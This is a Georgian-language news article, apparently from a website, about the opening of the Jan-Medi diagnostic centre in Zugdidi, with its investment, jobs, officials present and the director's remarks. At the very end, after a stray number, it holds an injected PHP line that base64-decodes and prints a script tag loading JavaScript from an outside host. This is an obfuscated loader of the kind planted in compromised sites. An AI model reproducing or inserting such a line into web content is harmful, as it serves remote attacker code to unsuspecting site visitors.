celsiusi
ავერსი საქკაბელი

ქალაქ ზუგდიდში, მულტიპროფილური დიაგნოსტიკური ცენტრი ჯან-მედი გაიხსნა.

სამედიცინო‌ ‌დაწესებულება‌ ‌განთავსებული‌ ‌ქალაქის ცენტრში და‌ ‌ დატვირთულია‌ ‌ულტრათანამედროვე‌ ‌სამედიცინო‌ ‌აპარატურით. ‌დიაგნოსტიკური‌ ‌ცენტრის‌ ‌გახსნაში‌ ‌100   ‌000 ‌ლარის‌ ‌ინვესტიცია‌ ‌ჩაიდო‌ ‌ და‌ ამ ეტაპისთის 30 ‌სამუშაო‌ ‌ადგილი‌ ‌შეიქმნა.‌ ‌დიაგნოსტიკური ცენტრის ოფიციალურ გახსნას სამეგრელო-ზემო სვანეთის სახელმწიფო რწმუნებულის პირველი მოადგილე ნინო ვიბლიანი, მოადგილე დავით კუხალეიშვილი, ზუგდიდის მერის პირველი მოადგილე კონტანტინე კაკავა, სამედიცინო და სხვადასხვა სფეროს წარმომადგენლები ესწრებოდნენ.

ჯან-მედი მულტიპროფილური ცენტრია, რომელიც აღიჭურვა გერმანული ხარისხის აპარატურით. ყოველდღური შიდა ხარისხის კონტროლით ცენტრი ორიენრიტებულია ხარისზხზე და ხელმისაწვდომია ჩვენი რეგიონის ყველა მოქალაქისთვის. მზად ვართ მივიღოთ მონაწილეობა სოციალურ პროექტებში, დახმარება გავუწიოთ ონკოლოგიით დაავადებულ პაციენტებს, ბავშვებს და ხანდაზმულებს. პროცესშია თანამშრომლობის მემორანდუმების გაფორმება წამყვან კლინიკებთან, როგორიცაა იაშვილის ბავშვთა და გაგუას კლინიკა, უროლოგიის ცენტრი და ა.შ. ამასთან, ამ მიმართულებით, მეორე ეტაპი იქნება, თურქეთის წამყვანი კლინიკებიდან სპეციალისტების ჩამოყვანა”, - განაცხადა დიაგნოსტიკური ცენტრი ჯან-მედის დირექტორმა ლელა ქაჯაიამ.

 

 

972
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");